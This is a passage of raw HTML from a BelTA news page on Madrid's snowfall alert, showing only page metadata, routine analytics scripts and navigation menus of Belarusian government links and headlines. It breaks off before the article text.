    
                <!DOCTYPE HTML>
<html lang="ru-RU" prefix="og: http://ogp.me/ns#">
<head>
	<title>Оранжевый уровень опасности объявлен в Мадриде из-за снегопада</title>
	<meta charset="UTF-8"/>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
        <meta http-equiv="Content-Language" content="ru"/>
        <meta name="viewport" content="width=device-width"/>
	<link rel="stylesheet" href="/styles/general_styles.css" type="text/css" />
	<link rel="stylesheet" href="/styles/styles_nt.css" type="text/css" />
        <link rel="stylesheet" href="/styles/tr_styles.css" type="text/css" />
                <link rel="stylesheet" href="/styles/jquery-ui-1.10.4.custom.css" type="text/css" />
                <link rel="icon" href="/desimages/fav.png" type="image/png"/>
        <link rel="alternate" media="only screen and (max-width: 640px)" href="http://m.belta.by/world/view/oranzhevyj-uroven-opasnosti-objjavlen-v-madride-iz-za-snegopada-288043-2018/" />
	<meta name="keywords" content=""/>
	<meta name="description" content="Из-за снежных заносов и обледенения затруднено движение на 387 трассах страны, 56 из них перекрыты. Дорожные службы советуют водителям по возможности воздержаться от поездок."/>
                    <meta property="og:locale" content="ru_RU" />
                            <meta property="og:site_name" content="Белорусское телеграфное агентство" />
                            <meta property="og:title" content="Оранжевый уровень опасности объявлен в Мадриде из-за снегопада" />
                            <meta property="og:type" content="article" />
                            <meta property="og:url" content="http://www.belta.by/world/view/oranzhevyj-uroven-opasnosti-objjavlen-v-madride-iz-za-snegopada-288043-2018" />
                            <meta property="og:image" content="http://www.belta.by/images/storage/news/000026_1517840719_big.jpg" />
                            <meta property="og:description" content="Из-за снежных заносов и обледенения затруднено движение на 387 трассах страны, 56 из них перекрыты. Дорожные службы советуют водителям по возможности воздержаться от поездок." />
                            <meta property="og:section" content="В мире" />
                            <meta property="article:published_time" content="2018-02-05 17:15:01" />
                            <meta property="article:modified_time" content="2018-02-05 17:25:15" />
                            <meta property="article:tag" content="зима" />
                            <meta property="article:tag" content="Испания" />
                            <meta property="article:tag" content="погода" />
                            <meta property="article:tag" content="реагирование на ЧС" />
                    	                
                
                
                        <meta name='yandex-verification' content='5663cc016ad6440d' />
            
                        <meta name="google-site-verification" content="andJQrL6AnIWI-D4xvMHHqOqg8Lisx5D6kMC7u9o5Bk" />
            
                
                        <!--LiveInternet counter--><script type="text/javascript"><!--
new Image().src = "//counter.yadro.ru/hit?r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";h"+escape(document.title.substring(0,80))+
";"+Math.random();//--></script><!--/LiveInternet-->
            
                        <script charset="UTF-8" src="//cdn.sendpulse.com/js/push/a5dce4feb84b33839120f31ac11be03b_0.js" async></script>
            
                        <meta property="fb:pages" content="107521439328407" />

            
                        <script id="my-widget-script" async
        src="https://likemore-go.imgsmail.ru/widget.js"
        data-uid="d4550f1d98a6ab3306924c7ca4718c90">
</script>

            
        

       
        
        
                    
</head>
<body>
    <a name="top" id="top"></a>
    <div class="all ">
        <a href="http://m.belta.by/world/view/oranzhevyj-uroven-opasnosti-objjavlen-v-madride-iz-za-snegopada-288043-2018/" class="to_full_hid" id="full_top" title="Мобильная версия" onclick="delete_cookie('mobile_device')">Мобильная версия</a>
                
                <div class="top_line">
            <div class="main_langs" id="main_langs">
	
                    <div class="main_lang_item main_lang_selected" ><a  onclick="return open_langs('main_langs', 'main_langs')"  href="http://www.belta.by/" title="Рус">Рус</a>
    </div>
	
                    <div class="main_lang_item " ><a    href="http://blr.belta.by" title="Бел" >Бел</a>
    </div>
	
                    <div class="main_lang_item " ><a    href="http://eng.belta.by" title="Eng" >Eng</a>
    </div>
	
                    <div class="main_lang_item " ><a    href="http://deu.belta.by" title="Deu" >Deu</a>
    </div>
	
                    <div class="main_lang_item " ><a    href="http://esp.belta.by" title="Esp" >Esp</a>
    </div>
	
                    <div class="main_lang_item " ><a    href="http://chn.belta.by/" title="中文" >中文</a>
    </div>
</div>
		
                <div class="social_top">
               
                            <div class="social_top_item">
                    <a href="/rss" title="Rss"  target ="_self">
                        <img src="http://www.belta.by/images/storage/banners/000015_06c67faab12793f011de90a38aef8cf1_work.jpg" alt="Rss" title="Rss" onmouseover="this.src='http://www.belta.by/images/storage/banners/000015_e75332d9759a535dbd02582b38240ace_work.jpg'" onmouseout="this.src='http://www.belta.by/images/storage/banners/000015_06c67faab12793f011de90a38aef8cf1_work.jpg'"/>
                    </a>
                </div>                    
           
                    
                   
                            <div class="social_top_item">
                    <a href="https://vk.com/beltanews" title="Вконтакте" rel="nofollow"  target ="_blank">
                        <img src="http://www.belta.by/images/storage/banners/000015_31db2ca27a159543cf8b7be9caedb706_work.jpg" alt="Вконтакте" title="Вконтакте" onmouseover="this.src='http://www.belta.by/images/storage/banners/000015_a2dbfb573d42641b8066e5225b92011b_work.jpg'" onmouseout="this.src='http://www.belta.by/images/storage/banners/000015_31db2ca27a159543cf8b7be9caedb706_work.jpg'"/>
                    </a>
                </div>                    
           
                    
                   
                            <div class="social_top_item">
                    <a href="http://www.twitter.com/beltanews" title="twitter"  target ="_blank">
                        <img src="http://www.belta.by/images/storage/banners/000015_3a2e0ff45c6c22d43d458776ffe014b0_work.jpg" alt="twitter" title="twitter" onmouseover="this.src='http://www.belta.by/images/storage/banners/000015_5d783aea0f6c76683722fb1ba6c1c1d1_work.jpg'" onmouseout="this.src='http://www.belta.by/images/storage/banners/000015_3a2e0ff45c6c22d43d458776ffe014b0_work.jpg'"/>
                    </a>
                </div>                    
           
                    
                   
                            <div class="social_top_item">
                    <a href="https://www.instagram.com/beltanews/" title="Instagram" rel="nofollow"  target ="_blank">
                        <img src="http://www.belta.by/images/storage/banners/000015_dfb020327a27875950807e5a19ffd020_work.jpg" alt="Instagram" title="Instagram" onmouseover="this.src='http://www.belta.by/images/storage/banners/000015_16d12d0a01989bf60add6345e63d7d6c_work.jpg'" onmouseout="this.src='http://www.belta.by/images/storage/banners/000015_dfb020327a27875950807e5a19ffd020_work.jpg'"/>
                    </a>
                </div>                    
           
                    
                   
                            <div class="social_top_item">
                    <a href="http://www.youtube.com/user/beltavideo" title="YouTube" rel="nofollow"  target ="_blank">
                        <img src="http://www.belta.by/images/storage/banners/000015_d13d4ea0deac25c940a3d9accb7071c8_work.jpg" alt="YouTube" title="YouTube" onmouseover="this.src='http://www.belta.by/images/storage/banners/000015_f1b4133b2972136f56addd2ce6070ed2_work.jpg'" onmouseout="this.src='http://www.belta.by/images/storage/banners/000015_d13d4ea0deac25c940a3d9accb7071c8_work.jpg'"/>
                    </a>
                </div>                    
           
                    
                   
                            <div class="social_top_item">
                    <a href="https://www.facebook.com/beltanews/" title="facebook" rel="nofollow"  target ="_blank">
                        <img src="http://www.belta.by/images/storage/banners/000015_85de3d590e2215f9ee73d91065827c5f_work.jpg" alt="facebook" title="facebook" onmouseover="this.src='http://www.belta.by/images/storage/banners/000015_2dd7ef0e89eb8223de5094653e8e3ca9_work.jpg'" onmouseout="this.src='http://www.belta.by/images/storage/banners/000015_85de3d590e2215f9ee73d91065827c5f_work.jpg'"/>
                    </a>
                </div>                    
           
                    
                   
                            <div class="social_top_item">
                    <a href="http://ok.ru/beltanews" title="odnoklassniki" rel="nofollow"  target ="_blank">
                        <img src="http://www.belta.by/images/storage/banners/000015_b04121f7a43df29677bf43d83d5f7afd_work.jpg" alt="odnoklassniki" title="odnoklassniki" onmouseover="this.src='http://www.belta.by/images/storage/banners/000015_5444909c31e907584930038efb9dec9a_work.jpg'" onmouseout="this.src='http://www.belta.by/images/storage/banners/000015_b04121f7a43df29677bf43d83d5f7afd_work.jpg'"/>
                    </a>
                </div>                    
           
                    
        </div>

                <script type="text/javascript">
        var scroll_items = Array();
    </script>
<div class="projects_menu">
	
                    <div class="projects_menu_item "><a target="_blank"   href="http://www.belta.by/meteo/?utm_source=belta&utm_medium=menu&utm_campaign=pogodatop" title="Погода" ><img src=http://www.belta.by/images/storage/menu/000091_755eedb610ed871e8068159430217a59.png alt="Погода" title="Погода" />Погода</a>
            </div>
	
                    <div class="projects_menu_item "><a target="_blank"   href="http://www.belta.by/currency/?utm_source=belta&utm_medium=menu&utm_campaign=kurstop" title="Курсы" ><img src=http://www.belta.by/images/storage/menu/000091_b099f7d483c857fc6bffee21f0589cf1.png alt="Курсы" title="Курсы" />Курсы</a>
            </div>
	
                    <div class="projects_menu_item "><a target="_blank"   href="http://www.belta.by/horoscope/?utm_source=belta&utm_medium=menu&utm_campaign=gorotop" title="Гороскоп" ><img src=http://www.belta.by/images/storage/menu/000091_c07ee4e9f2de2f6a3b217d78187816d4.png alt="Гороскоп" title="Гороскоп" />Гороскоп</a>
            </div>
	
                    <div class="projects_menu_item "><a target="_blank"   href="http://tv.belta.by/?utm_source=belta&utm_medium=top&utm_campaign=beltatop" title="ТВ-гид" ><img src=http://www.belta.by/images/storage/menu/000091_9256b92bec62a22c177c5f3f37eee2d3.png alt="ТВ-гид" title="ТВ-гид" />ТВ-гид</a>
            </div>
	
                    <div class="projects_menu_item "><a target="_blank"   href="http://photobelta.by/" title="Фотохроника"  rel="nofollow"><img src=http://www.belta.by/images/storage/menu/000091_fc0ae0aee903e014e96eae10da7bf039.png alt="Фотохроника" title="Фотохроника" />Фотохроника</a>
            </div>
	
                    <div class="projects_menu_item projects_menu_drop"><a    href="http://www.belta.by/" title="ПРОЕКТЫ">ПРОЕКТЫ</a>
                    <script type="text/javascript">
                scroll_items[scroll_items.length] = "59";
            </script>
                        <ul id="59">
           	
                <li>
                                                                                                                        <a target="_blank"   href="http://7dney.by/" title="7 дней" ><img src=http://www.belta.by/images/storage/menu/000091_dfe405d4ea0bac5c595cc29ec5efff3c.png alt="7 дней" title="7 дней" />7 дней</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://belarus-economy.by" title="Экономика Беларуси" ><img src=http://www.belta.by/images/storage/menu/000091_ceaebeb471b5b1fefce5d2d2d7b6984a.png alt="Экономика Беларуси" title="Экономика Беларуси" />Экономика Беларуси</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://beldumka.belta.by/" title="Беларуская Думка"  rel="nofollow"><img src=http://www.belta.by/images/storage/menu/000091_de12a81a39ab7b42b0a6ec5a306c4cc6.png alt="Беларуская Думка" title="Беларуская Думка" />Беларуская Думка</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://atom.belta.by/ru" title="Атомная энергетика"  rel="nofollow"><img src=http://www.belta.by/images/storage/menu/000091_48605fe6376bbc93042a72579cc13ab6.png alt="Атомная энергетика" title="Атомная энергетика" />Атомная энергетика</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://peramoga.belta.by/" title="Хроника Победы" >Хроника Победы</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://www.belta.by/posters/" title="Плакаты БелТА">Плакаты БелТА</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://www.belta.by/search/findTags/1193" title="Репортажи" >Репортажи</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://www.belta.by/search/findTags/1192" title="Фоторепортажи" >Фоторепортажи</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://www.belta.by/video/" title="Видео" >Видео</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://best-photo.belta.by/2017" title="Лучшие фото БЕЛТА 2017" >Лучшие фото БЕЛТА 2017</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://parad.belta.by/" title="Парад в День Независимости-2017" >Парад в День Независимости-2017</a>
                        
                                    </li>
                        </ul>
            </div>
	
                    <div class="projects_menu_item projects_menu_drop"><a    href="http://www.belta.by/" title="ГОСОРГАНЫ">ГОСОРГАНЫ</a>
                    <script type="text/javascript">
                scroll_items[scroll_items.length] = "111";
            </script>
                        <ul id="111">
           	
                <li>
                                                                                                                        <a target="_blank"   href="http://president.gov.by/" title="Президент Беларуси"  rel="nofollow">Президент Беларуси</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://www.government.by/ru/" title="Совет Министров"  rel="nofollow">Совет Министров</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://www.sovrep.gov.by/" title="Совет Республики"  rel="nofollow">Совет Республики</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://www.house.gov.by/" title="Палата представителей"  rel="nofollow">Палата представителей</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://www.kc.gov.by/" title="Конституционный суд"  rel="nofollow">Конституционный суд</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://www.court.by/" title="Верховный суд"  rel="nofollow">Верховный суд</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://www.kgk.gov.by/ru/" title="Комитет государственного контроля"  rel="nofollow">Комитет государственного контроля</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://www.prokuratura.gov.by/" title="Генеральная прокуратура"  rel="nofollow">Генеральная прокуратура</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://www.nbrb.by/" title="Национальный банк"  rel="nofollow">Национальный банк</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://www.mas.by/" title="Министерство архитектуры и строительства"  rel="nofollow">Министерство архитектуры и строительства</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://mvd.gov.by/" title="Министерство внутренних дел"  rel="nofollow">Министерство внутренних дел</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://www.mjkx.gov.by/" title="Министерство ЖКХ"  rel="nofollow">Министерство ЖКХ</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://minzdrav.by/" title="Министерство здравоохранения"  rel="nofollow">Министерство здравоохранения</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://www.mfa.gov.by/" title="Министерство иностранных дел"  rel="nofollow">Министерство иностранных дел</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://www.mininform.gov.by/" title="Министерство информации"  rel="nofollow">Министерство информации</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://www.kultura.by/" title="Министерство культуры"  rel="nofollow">Министерство культуры</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://www.mlh.gov.by/" title="Министерство лесного хозяйства"  rel="nofollow">Министерство лесного хозяйства</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://nalog.gov.by/" title="Министерство по налогам и сборам"  rel="nofollow">Министерство по налогам и сборам</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://edu.gov.by/" title="Министерство образования"  rel="nofollow">Министерство образования</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://www.mil.by/" title="Министерство обороны"  rel="nofollow">Министерство обороны</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://minpriroda.gov.by/" title="Министерство природных ресурсов"  rel="nofollow">Министерство природных ресурсов</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://www.minprom.gov.by/" title="Министерство промышленности"  rel="nofollow">Министерство промышленности</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://www.mpt.gov.by/" title="Министерство связи и информатизации"  rel="nofollow">Министерство связи и информатизации</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://www.mshp.minsk.by/" title="Министерство сельского хозяйства"  rel="nofollow">Министерство сельского хозяйства</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://www.mst.by/" title="Министерство спорта и туризма"  rel="nofollow">Министерство спорта и туризма</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://www.mintorg.gov.by/" title="Министерство торговли"  rel="nofollow">Министерство торговли</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://www.mintrans.gov.by/" title="Министерство транспорта и коммуникаций"  rel="nofollow">Министерство транспорта и коммуникаций</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://www.mintrud.gov.by/" title="Министерство труда и социальной защиты"  rel="nofollow">Министерство труда и социальной защиты</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://mchs.gov.by/" title="Министерство по чрезвычайным ситуациям"  rel="nofollow">Министерство по чрезвычайным ситуациям</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://www.minfin.gov.by/" title="Министерство финансов"  rel="nofollow">Министерство финансов</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://www.economy.gov.by/" title="Министерство экономики"  rel="nofollow">Министерство экономики</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://www.minenergo.gov.by/" title="Министерство энергетики"  rel="nofollow">Министерство энергетики</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://www.minjust.by/" title="Министерство юстиции"  rel="nofollow">Министерство юстиции</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://www.gki.gov.by/" title="Госкомитет по имуществу"  rel="nofollow">Госкомитет по имуществу</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://www.gknt.gov.by/" title="Госкомитет по науке и технологиям"  rel="nofollow">Госкомитет по науке и технологиям</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://gosstandart.gov.by/" title="Госкомитет по стандартизации"  rel="nofollow">Госкомитет по стандартизации</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://www.sudexpert.gov.by/" title="Госкомитет судебных экспертиз"  rel="nofollow">Госкомитет судебных экспертиз</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://www.gpk.gov.by/" title="Государственный пограничный комитет"  rel="nofollow">Государственный пограничный комитет</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://www.gtk.gov.by/" title="Государственный таможенный комитет"  rel="nofollow">Государственный таможенный комитет</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://www.belstat.gov.by/" title="Национальный статистический комитет"  rel="nofollow">Национальный статистический комитет</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://sk.gov.by/ru/" title="Следственный комитет"  rel="nofollow">Следственный комитет</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://brest-region.gov.by/" title="Брестский облисполком"  rel="nofollow">Брестский облисполком</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://www.vitebsk-region.gov.by/" title="Витебский облисполком"  rel="nofollow">Витебский облисполком</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://gomel-region.gov.by/" title="Гомельский облисполком"  rel="nofollow">Гомельский облисполком</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://grodno-region.gov.by/ru/" title="Гродненский облисполком"  rel="nofollow">Гродненский облисполком</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://www.minsk-region.gov.by/" title="Минский облисполком"  rel="nofollow">Минский облисполком</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://region.mogilev.by/" title="Могилевский облисполком"  rel="nofollow">Могилевский облисполком</a>
                        
                                    </li>
            	
                <li>
                                                                                                                        <a target="_blank"   href="http://www.minsk.gov.by/" title="Минский горисполком"  rel="nofollow">Минский горисполком</a>
                        
                                    </li>
                        </ul>
            </div>
</div>

        </div>
        <div class="header">
            <div class="site_logo">    
                                                <a href="/" title="Белорусское телеграфное агентство"  target ="_self">
                            <img src="http://www.belta.by/images/storage/banners/000016_5c344cd1e0b662f37100525b47e7c06e_work.jpg" alt="Белорусское телеграфное агентство" title="Белорусское телеграфное агентство" />
                        </a>

                        
    
</div>
                            <div class="site_title">    
                                                <a href="/" title="Новости Беларуси"  target ="_self">
                            <img src="http://www.belta.by/images/storage/banners/000017_81244b319018165f04b67fbd6b5f44d9_work.jpg" alt="Новости Беларуси" title="Новости Беларуси" />
                                                    </a>

                        
    
</div>
                        <div class="header_right">
                <div class="header_right_inner">
            <div class="header_info">
                <div class="header_date">06 февраля 2018, Вт</div>
                <div class="header_pc">
                  
                              <div class="header_pogoda">
                   -7&deg;C<br/>
    
<img src="/desimages/n_OVC.png" title="Сплошная облачность. снег"  alt="Сплошная облачность"/>
 





                                                </div>
               <a href="/currency/" title="Подробнее о курсах валют НБ" class="header_currency">
                           
        EUR <b>2.4665</b><br/>
   USD <b>1.9808</b><br/>
   RUB <b>3.5005</b><br/>


               </a>
                </div>
              
                
            </div>
                <div class="header_topics"><div>    <div class="header_topic_item">
	            <a  href="http://www.belta.by/all-rubric-news/viewSuzet/sodejstvie-zanjatosti-naselenija-333/" title="Содействие занятости населения">
                <img src="http://www.belta.by/images/storage/news/thumb/000001_504087.jpg" alt="Содействие занятости населения" title="Содействие занятости населения"/>
            </a>
	            <a href="http://www.belta.by/all-rubric-news/viewSuzet/sodejstvie-zanjatosti-naselenija-333/" class="header_topic_item_title" title="Содействие занятости населения">Содействие занятости населения</a>
    </div>
    <div class="header_topic_item">
	            <a  href="http://www.belta.by/all-rubric-news/viewSuzet/uluchshenie-uslovij-vedenija-biznesa-313/" title="Улучшение условий ведения бизнеса">
                <img src="http://www.belta.by/images/storage/news/thumb/000001_579450.jpg" alt="Улучшение условий ведения бизнеса" title="Улучшение условий ведения бизнеса"/>
            </a>
	            <a href="http://www.belta.by/all-rubric-news/viewSuzet/uluchshenie-uslovij-vedenija-biznesa-313/" class="header_topic_item_title" title="Улучшение условий ведения бизнеса">Улучшение условий ведения бизнеса</a>
    </div>
    <div class="header_topic_item">
	            <a  href="http://www.belta.by/all-rubric-news/viewSuzet/vybory-deputatov-v-mestnye-sovety-322/" title="Выборы депутатов в местные Советы">
                <img src="http://www.belta.by/images/storage/news/thumb/000001_832892.jpg" alt="Выборы депутатов в местные Советы" title="Выборы депутатов в местные Советы"/>
            </a>
	            <a href="http://www.belta.by/all-rubric-news/viewSuzet/vybory-deputatov-v-mestnye-sovety-322/" class="header_topic_item_title" title="Выборы депутатов в местные Советы">Выборы депутатов в местные Советы</a>
    </div>
</div></div>
                </div>
            </div>
        </div>
        <div id="menu_position">
        <div class="menu_line" id="menu_line">
            <a href="#top" class="to_top" title="" alt=""></a>
            <div class="menu">
    <div class="menu_title">Меню</div>
    <div id="menu">
        <div class="menu_col">
                                    	
                    <div class="menu_item "><a   href="http://www.belta.by/president/" title="Президент">Президент</a>
        <div class="main_lang_second">
            

        <div class="h_menu_tags_tape">
           
            <div><a href="/search/findTags/894" title="выступления">выступления</a></div>
           
            <div><a href="/search/findTags/927" title="визиты">визиты</a></div>
           
            <div><a href="/search/findTags/834" title="декреты">декреты</a></div>
           
            <div><a href="/search/findTags/766" title="заседания">заседания</a></div>
           
            <div><a href="/search/findTags/649" title="Лукашенко">Лукашенко</a></div>
           
            <div><a href="/search/findTags/554" title="назначения">назначения</a></div>
           
            <div><a href="/search/findTags/452" title="поздравления">поздравления</a></div>
                </div>


<div class="h_menu_inmain">
                                    	                	                                                                                                                <a href="http://www.belta.by/president/view/stesnjatsja-starogo-nechego-lukashenko-podcherkivaet-osobuju-rol-kgb-v-obespechenii-bezopasnosti-strany-287454-2018/"  title="&quot;Стесняться старого нечего&quot; - Лукашенко подчеркивает особую роль КГБ в обеспечении безопасности страны" class="news_with_rubric_img">
                        <img src="http://www.belta.by/images/storage/news/000019_1517475810_small.jpg" alt="Александр Лукашенко и Валерий Вакульчик" title="Александр Лукашенко и Валерий Вакульчик"/>
                    </a>
                                <a href="http://www.belta.by/president/view/stesnjatsja-starogo-nechego-lukashenko-podcherkivaet-osobuju-rol-kgb-v-obespechenii-bezopasnosti-strany-287454-2018/"  title="&quot;Стесняться старого нечего&quot; - Лукашенко подчеркивает особую роль КГБ в обеспечении безопасности страны" class="fp_rb_news_title">
                    "Стесняться старого нечего" - Лукашенко подчеркивает особую роль КГБ в обеспечении безопасности страны
                    <span class="with_video"></span> 
                                    </a>
                </div>

    <div class="h_menu_lenta">
            <div>
		                                	                	                                                <a href="http://www.belta.by/president/view/finansirovanie-zakupki-i-medstrahovanie-uregulirovany-pervoocherednye-voprosy-podgotovki-ii-287555-2018/"  title="Финансирование, закупки и медстрахование - урегулированы первоочередные вопросы подготовки II Европейских игр" class="fp_rb_news_title">
                    Финансирование, закупки и медстрахование - урегулированы первоочередные вопросы подготовки II Европейских игр
                     
                                    </a>
                            </div>
            
            <div>
		                                	                	                                                <a href="http://www.belta.by/president/view/rekonstruktsija-mosta-cherez-pripjat-v-zhitkovichskom-rajone-vkljuchena-v-gosinvestprogrammu-na-2018-287551-2018/"  title="Реконструкция моста через Припять в Житковичском районе включена в госинвестпрограмму на 2018 год" class="fp_rb_news_title">
                    Реконструкция моста через Припять в Житковичском районе включена в госинвестпрограмму на 2018 год
                     
                                    </a>
                            </div>
            
            <div>
		                                	                	                                                <a href="http://www.belta.by/president/view/lukashenko-proizvel-kadrovye-naznachenija-v-strukture-mvd-287496-2018/"  title="Лукашенко произвел кадровые назначения в структуре МВД" class="fp_rb_news_title">
                    Лукашенко произвел кадровые назначения в структуре МВД
                     
                                    </a>
                            </div>
            
            <div>
		                                	                	                                                <a href="http://www.belta.by/president/view/lukashenko-belarus-gotova-vnesti-ljuboj-vklad-v-obespechenie-bezopasnosti-evropejskogo-kontinenta-286966-2018/"  title="Лукашенко: Беларусь готова внести любой вклад в обеспечение безопасности Европейского континента" class="fp_rb_news_title">
                    Лукашенко: Беларусь готова внести любой вклад в обеспечение безопасности Европейского континента
                    <span class="with_video"></span> 
                                    </a>
                            </div>
            
    </div>

<div class="lastSuzetHMenu">
    <a  href="http://www.belta.by/all-rubric-news/viewSuzet/kadrovye-reshenija-prezidenta-35/" title="Кадровые решения Президента">
	            <span class="lastSuzetHMenuImg"><img src="http://www.belta.by/images/storage/news/000001_243194.jpg" alt="Кадровые решения Президента" title="Кадровые решения Президента"/></span>
            
	            <span class="lastSuzetHMenuTitle">Кадровые решения Президента</span>
    </a>
    <a  href="http://www.belta.by/all-rubric-news/viewSuzet/rabochie-poezdki-prezidenta-52/" title="Рабочие поездки Президента">
	            <span class="lastSuzetHMenuImg"><img src="http://www.belta.by/images/storage/news/000001_584377.jpg" alt="Рабочие поездки Президента" title="Рабочие поездки Президента"/></span>
            
	            <span class="lastSuzetHMenuTitle">Рабочие поездки Президента</span>
    </a>
<div class="clear"></div>
</div>


        </div>
    </div>
    	
                    <div class="menu_item "><a   href="http://www.belta.by/politics/" title="Политика">Политика</a>
        <div class="main_lang_second">
            

        <div class="h_menu_tags_tape">
           
            <div><a href="/search/findTags/930" title="визовая политика">визовая политика</a></div>
           
            <div><a href="/search/findTags/893" title="выборы в Беларуси">выборы в Беларуси</a></div>
           
            <div><a href="/search/findTags/793" title="Евросоюз">Евросоюз</a></div>
           
            <div><a href="/search/findTags/614" title="МИД">МИД</a></div>
           
            <div><a href="/search/findTags/518" title="ОДКБ">ОДКБ</a></div>
           
            <div><a href="/search/findTags/469" title="переговоры">переговоры</a></div>
           
            <div><a href="/search/findTags/303" title="СНГ">СНГ</a></div>
                </div>


<div class="h_menu_inmain">
                                    	                	                                                                                                                <a href="http://www.belta.by/politics/view/belarus-pridaet-bolshoe-znachenie-razvitiju-konstruktivnyh-otnoshenij-so-shvejtsariej-andrejchenko-287861-2018/"  title="Беларусь придает большое значение развитию конструктивных отношений со Швейцарией - Андрейченко" class="news_with_rubric_img">
                        <img src="http://www.belta.by/images/storage/news/000020_1517732531_small.jpg" alt="" title=""/>
                    </a>
                                <a href="http://www.belta.by/politics/view/belarus-pridaet-bolshoe-znachenie-razvitiju-konstruktivnyh-otnoshenij-so-shvejtsariej-andrejchenko-287861-2018/"  title="Беларусь придает большое значение развитию конструктивных отношений со Швейцарией - Андрейченко" class="fp_rb_news_title">
                    Беларусь придает большое значение развитию конструктивных отношений со Швейцарией - Андрейченко
                     
                    <span class="with_photo"></span>                </a>
                </div>

    <div class="h_menu_lenta">
            <div>
		                                	                	                                                <a href="http://www.belta.by/politics/view/torgovo-ekonomicheskoe-sotrudnichestvo-belarusi-i-laosa-imeet-potentsial-dlja-razvitija-posol-288054-2018/"  title="Торгово-экономическое сотрудничество Беларуси и Лаоса имеет потенциал для развития - посол" class="fp_rb_news_title">
                    Торгово-экономическое сотрудничество Беларуси и Лаоса имеет потенциал для развития - посол
                     
                                    </a>
                            </div>
            
            <div>
		                                	                	                                                <a href="http://www.belta.by/politics/view/uchastie-v-regionalnom-forume-natsionalnyh-koordinatorov-po-tsur-v-minske-podtverdili-25-gosudarstv-287898-2018/"  title="Участие в региональном форуме национальных координаторов по ЦУР в Минске подтвердили 25 государств" class="fp_rb_news_title">
                    Участие в региональном форуме национальных координаторов по ЦУР в Минске подтвердили 25 государств
                     
                                    </a>
                            </div>
            
            <div>
